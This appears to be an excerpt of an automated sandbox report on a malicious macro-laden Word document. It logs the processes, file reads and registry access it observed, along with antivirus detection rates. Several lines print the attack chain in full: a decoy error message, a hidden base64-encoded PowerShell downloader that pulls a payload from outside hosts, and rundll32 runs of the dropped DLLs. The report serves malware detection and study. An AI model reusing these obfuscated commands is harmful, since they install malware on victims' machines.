Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v.... .......0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v....X.......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v............0.z.............................4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v....8.......0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....KX...............O.............}..v............0.z.....................r.......4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j....@.................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ ..........j.....KX...............O.............}..v....P.......0.z..............HX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................+..j......................O.............}..v............0.z.............(IX.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................k2.j.....(................O.............}..v.....S;.....0.z...............X.............4...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................k2.j.....(................O.............}..v......;.....0.z...............X.............4...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA

Source: Io8ic2291n.doc	Metadefender: Detection: 54%
Source: Io8ic2291n.doc	ReversingLabs: Detection: 89%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',FOsZnZScT
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',nQAMXkchr
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',ggJG
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',dIFPdOFPiwZFUl
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',OpIYBjvoaiwa
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',FOsZnZScT	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',nQAMXkchr	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofzzkuwngkcnufwj\wvmgxwsmudidtny.hvy',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',ggJG	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wjzei\rjte.fnz',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',dIFPdOFPiwZFUl	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hrjzsjr\mlycub.kot',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',OpIYBjvoaiwa	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqtptfsfibbnlgn\rmzbyllndllgsq.bnt',#1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb` source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2161182141.00000000028A0000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: Io8ic2291n.doc	Stream path 'Macros/VBA/Nst6otvnmgmpw' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Nst6otvnmgmpw			Name: Nst6otvnmgmpw

Document contains an embedded VBA with many randomly named variables

Show sources

Source: Io8ic2291n.doc

Stream path 'Macros/VBA/Nst6otvnmgmpw' : High entropy of concatenated variable names

Obfuscated command line found

Show sources

Source: unknown

